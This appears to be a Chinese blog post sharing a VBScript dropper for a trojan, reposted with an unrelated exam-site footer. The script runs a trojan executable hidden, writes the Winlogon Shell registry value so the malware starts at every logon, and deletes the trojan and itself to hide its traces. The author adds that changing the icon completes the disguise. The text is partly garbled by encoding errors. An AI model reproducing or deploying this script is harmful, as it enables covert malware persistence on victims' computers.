終于寫(xiě)出了個(gè)腳本���,實(shí)現(xiàn)flux在注冊(cè)表中的啟動(dòng)�����,當(dāng)然是更隱蔽的方法�����,別人知道了這個(gè)地方也就沒(méi)戲了���。
不過(guò)別人一般沒(méi)這個(gè)閑工夫檢查那么多位置的����!就連我也做不到~~
代碼如下:
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "%windir%\flumasko.exe",0 //運(yùn)行木馬程序
set sm=Wscript.CreateObject("WScript.Shell")
sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe"
//寫(xiě)進(jìn)注冊(cè)表項(xiàng)實(shí)現(xiàn)自啟動(dòng)
set WshShell=WScript.CreateObject("WScript.Shell")
WScript.Sleep 2000
//等木馬的執(zhí)行完畢
Set fso=CreateObject("Scripting.FileSystemObject")
f=fso.DeleteFile ("flumasko.exe")
f=fso.DeleteFile (WScript.ScriptName)
//毀尸滅跡
再修改下圖標(biāo)就大功告成了��!
由于各方面情況的不斷調(diào)整與變化���,易賢網(wǎng)提供的所有考試信息和咨詢回復(fù)僅供參考���,敬請(qǐng)考生以權(quán)威部門(mén)公布的正式信息和咨詢?yōu)闇?zhǔn)!
公眾號(hào)
事業(yè)單位
當(dāng)前位置:
公考類(lèi)
招聘類(lèi)
各類(lèi)考試
